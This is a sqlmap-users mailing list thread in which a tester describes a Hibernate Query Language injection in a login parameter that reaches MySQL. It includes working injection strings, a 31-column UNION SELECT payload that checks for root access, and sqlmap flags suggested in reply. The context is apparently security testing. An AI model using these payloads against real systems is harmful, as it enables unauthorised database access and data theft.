Re: [sqlmap-users] injecting into MySQL through HQL
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] injecting into MySQL through HQL
|
From: Chris O. <chr...@gm...> - 2017-02-24 23:23:40
|
I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote: > I hadn't tried the custom injection point, I'll give that a try. Do you > know the maximum number of fields the union will do, was thinking about it > after shutting machine down and think it's 30 so will need to increase that. > > Robin > > On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> > wrote: > >> I assume you've tried * for custom injection point and --technique=U? >> >> Whether or not it'll dance with HQL is another question entirely. >> >> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote: >> >> I've just found an instance of Hibernate Query Language injection that >> lets me get at an underlying MySQL database if I inject in the right way, >> some examples I've got are: >> >> loginName=a - works and gives 200 >> loginName=' - fails with HQL error and 500 >> loginName=a' or 'a'='a - works and gives 200 >> loginName=a\'' - gets through HQL and then generates a MySQL error in a >> where clause. The injection gets converted to where NAME='a\''' >> >> With some playing I've found that this is a valid injection and they are >> running as root as I get a 500 back when I supply root, a 200 when give >> something else. >> >> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10, >> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" >> from users where user()="root@localhost" -- '='1 >> >> The 500 is because some of the stuff from the union isn't being handled >> correctly by the page, the 200 is because the union doesn't return any data >> so the first bit (basically a=a) is returning valid data so getting through >> the rest of the parsing. >> >> So I think what I need to do is to tell SQLMap that it is a union >> injection with 31 fields and that the injection needs to go into here: >> >> loginName=a' and 'a\''="a" <INJECT> -- '='1 >> >> Can I do this? >> >> I've got all this set up and running in Burp so I can test things out if >> anyone needs me to. >> >> Robin >> >> ------------------------------------------------------------ >> ------------------ >> Check out the vibrant tech community on one of the world's most >> engaging tech sites, SlashDot.org! http://sdm.link/slashdot >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> |
